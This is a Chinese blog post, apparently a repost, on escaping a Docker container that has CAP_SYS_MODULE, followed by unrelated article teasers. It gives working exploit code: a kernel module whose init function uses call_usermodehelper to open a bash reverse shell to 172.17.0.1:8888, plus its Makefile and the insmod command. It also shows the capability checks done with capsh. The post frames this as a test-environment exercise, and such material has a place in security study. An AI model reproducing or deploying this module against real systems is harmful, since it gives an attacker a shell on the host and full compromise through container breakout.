云安全(2)--CAP_SYS_MODULE逃逸

news2024/11/7 7:46:35

文章目录

  • 测试环境配置
  • 实际环境利用

测试环境配置

docker run -it --cap-add=SYS_MODULE  ubuntu:18.04

实际环境利用

cat /proc/self/status|grep Cap

请添加图片描述
然后使用capsh decode一下

capsh --decode=00000000a80525fb

请添加图片描述
发现有CAP_SYS_MODULE权限,那么直接往内核注入恶意module,我们直接在容器里面安装必备的东西

apt update&&apt install -y gcc make  vim  linux-headers-$(uname -r) kmod

exp.c

#include <linux/module.h>
MODULE_LICENSE("GPL");
char *argv[] = {
    "/bin/bash",
    "-c",    
    "bash -i >&/dev/tcp/172.17.0.1/8888 0>&1",
    NULL    
};
static int __init connect_back_init(void)
{

    return call_usermodehelper(
        argv[0],     
        argv,        
        NULL,        
        UMH_WAIT_EXEC // don't wait for program return status
    );
}

static void __exit connect_back_exit(void)
{
}

module_init(connect_back_init);
module_exit(connect_back_exit);

Makefile

obj-m += exp.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) clean

make all编译一下

insmod exp.ko //就会反弹shell
rmmod exp.ko

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1114953.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Streamlit库开发python交互式Web应用程序

Streamlit是一个开源的Python库&#xff0c;旨在帮助开发人员轻松创建数据科学和机器学习的Web应用程序。它允许您只需几行Python代码即可构建交互式Web应用程序&#xff0c;因此常用于创建数据驱动的应用程序、仪表板和原型。Streamlit以其简单性而闻名&#xff0c;通常被数据…

光影之梦:影视动画渲染的魅力

在动画世界中&#xff0c;光影与色彩是赋予生命与灵魂的魔法。它们将虚无的想象变为具象的画面&#xff0c;让故事情感跃然于屏幕之上。影视动画渲染&#xff0c;正是这一魔法的精妙施展&#xff0c;它以光影为笔&#xff0c;色彩为墨&#xff0c;勾勒出一个个绚丽多姿的梦境。…

洗地机哪个好用?2023年洗地机推荐指南

说到提高家庭幸福生活的家电&#xff0c;洗地机肯定是少不了的&#xff0c;特别对于现在快节奏的生活来说&#xff0c;高效率的解决家务活&#xff0c;而且能够大幅度的提高生活质量。在市场上&#xff0c;消费者面临着选择合适洗地机的难题&#xff0c;因为有各种型号、功能和…

德国大陆博世 ars 548 4D 毫米波雷达 window 系统或者 Ubuntu 系统通讯以及数据解析和显示程序

德国大陆博世 ars 548 4D 毫米波雷达 window 系统或者 Ubuntu ROS 系统通讯以及数据解析和显示程序

这件事,准备考PMP的都必须知道

大家好&#xff0c;我是老原。 新的一月&#xff0c;新的困惑。最近接到的咨询很多&#xff0c;但的确出现了差异化的特质。 以前的粉丝朋友上来就问&#xff0c;我现在是项目经理&#xff0c;主要负责产品研发&#xff0c;我是考PMP还是NPDP好&#xff1f; 现在的粉丝朋友会…

AGC电路,模拟乘法器

文章目录 AGC电路乘法器 AGC电路 注&#xff1a;下面三个没试过 乘法器 TI只有这一种乘法器&#xff0c;跟ADI的AD534一模一样 这个报告里有很多错误 做乘法器最厉害的是ADI

JUC并发编程——各种锁的理解(基于狂神说的学习笔记)

各种锁的理解 公平锁与非公平锁 公平锁&#xff1a;非常公平&#xff0c;不能够插队&#xff0c;先来后到 非公平锁&#xff1a;可以插队&#xff0c;比较灵活&#xff08;默认都是非公平&#xff0c;如&#xff1a;synchronized,lock&#xff09; // Lock lock new Reent…

从一次性销售到持续收益:低代码服务商的转型之路

随着低代码市场快速发展&#xff0c;低代码代理商也成为近年来快速崛起的一种新型IT服务提供商&#xff0c;其以敏捷、灵活和高效的优势可以有效地帮助企业加速数字化转型。然而&#xff0c;尽管低代码代理商们的潜力巨大&#xff0c;却共同面临着一个关键的挑战——与客户的合…

瑞芯微RKNN开发·yolov7

官方预训练模型转换 下载yolov7源码解压到本地&#xff0c;并配置基础运行环境。下载官方预训练模型 yolov7-tiny.ptyolov7.pt… 进入yolov7-main目录下&#xff0c;新建文件夹weights&#xff0c;并将步骤2中下载的权重文件放进去。修改models/yolo.py文件 def forward(sel…

【C++】:类和对象(中)之类的默认成员函数——构造函数and析构函数

1.类的6个默认成员函数 如果一个类中什么成员都没有&#xff0c;简称为空类 空类中真的什么都没有吗&#xff1f;并不是&#xff0c;任何类在什么都不写时&#xff0c;编译器会自动生成以下6个默认成员函数 默认成员函数&#xff1a;用户没有显式实现&#xff0c;编译器会生成…

系统设计 - 我们如何通俗的理解那些技术的运行原理 - 第一部分:通信协议(2)

本心、输入输出、结果 文章目录 系统设计 - 我们如何通俗的理解那些技术的运行原理 - 第一部分&#xff1a;通信协议&#xff08;2&#xff09;前言SOAP vs REST vs GraphQL vs RPC代码优先与 API 优先HTTP 状态代码API 网关有什么作用步骤说明 我们如何设计有效和安全的 API弘…

Nautilus Chain 与 Coin98 生态达成合作,加速 Zebec 生态亚洲战略进程

目前&#xff0c;行业内首个模块化Layer3架构公链Nautilus Chain已经上线主网&#xff0c;揭示了模块化区块链领域迎来了全新的进程。在主网上线后&#xff0c;Nautilus Chain将扮演Zebec生态中最重要的底层设施角色&#xff0c;并将为Zebec APP以及Zebec Payroll规模性的采用提…

驱动day2作业

编写应用程序控制三盏灯亮灭 head.h #ifndef __HEAD_H__ #define __HEAD_H__ #define PHY_LED1_MODER 0x50006000 #define PHY_LED2_MODER 0x50007000 #define PHY_LED1_ODR 0x50006014 #define PHY_LED2_ODR 0x50007014 #define PHY_RCC 0x50000A28#endif demo1.c #includ…

海外调查问卷赚钱是真的吗?

海外问卷赚钱是真实的吗&#xff1f;我是橙河网络&#xff0c;一家问卷公司的老板&#xff0c;做这个行业已经2年时间了&#xff0c;首先给大家一个明确的回答&#xff1a;海外问卷调查赚钱是真实的&#xff01; 海外问卷调查项目&#xff0c;在国内已经存在一二十年的时间了&…

21.3 Python 使用DPKT分析数据包

dpkt项目是一个Python模块&#xff0c;主要用于对网络数据包进行解析和操作。它可以处理多种协议&#xff0c;例如TCP、UDP、IP等&#xff0c;并提供了一些常用的网络操作功能&#xff0c;例如计算校验和、解析DNS数据包等。由于其简单易用的特性&#xff0c;dpkt被广泛应用于网…

[C语言]排序的大乱炖——喵喵的成长记

宝子&#xff0c;你不点个赞吗&#xff1f;不评个论吗&#xff1f;不收个藏吗&#xff1f; 最后的最后&#xff0c;关注我&#xff0c;关注我&#xff0c;关注我&#xff0c;你会看到更多有趣的博客哦&#xff01;&#xff01;&#xff01; 喵喵喵&#xff0c;你对我真的很重要…

C# Onnx Detic 检测2万1千种类别的物体

效果 lable organism benthos heterotroph cell person animal plant food artifact hop check-in dressage curvet piaffe funambulism rock_climbing contact_sport outdoor_sport gymnastics acrobatics track_and_field track jumping broad_jump high_jump Fosbury_flop …

adb 获取 Android 设备中已安装的 apk 文件

前言 今天发现手机上一个应用在应用商店已经搜索不到了&#xff0c;想把其推荐给朋友使用&#xff0c;发现不知道从哪里找原始的 apk 安装文件&#xff0c;记录一下。 如何提取 apk 两种方法 MT管理器导出 可以使用 MT管理器(Android 平台逆向神器)&#xff0c;它有个 安装…

新版网站云监控计划任务系统源码+定时访问指定网址监控/更新(PHP源码)

源码简介&#xff1a; 新版网站云监控计划任务系统源码&#xff0c;能够定时访问网址监控&#xff0c;是更新的版本。该源码可以提供高效稳定的监控服务&#xff0c;免费简单使用并容易上手&#xff0c;这个为最新接口&#xff0c;能让用户更放心地进行任务监控。跟其他云任务…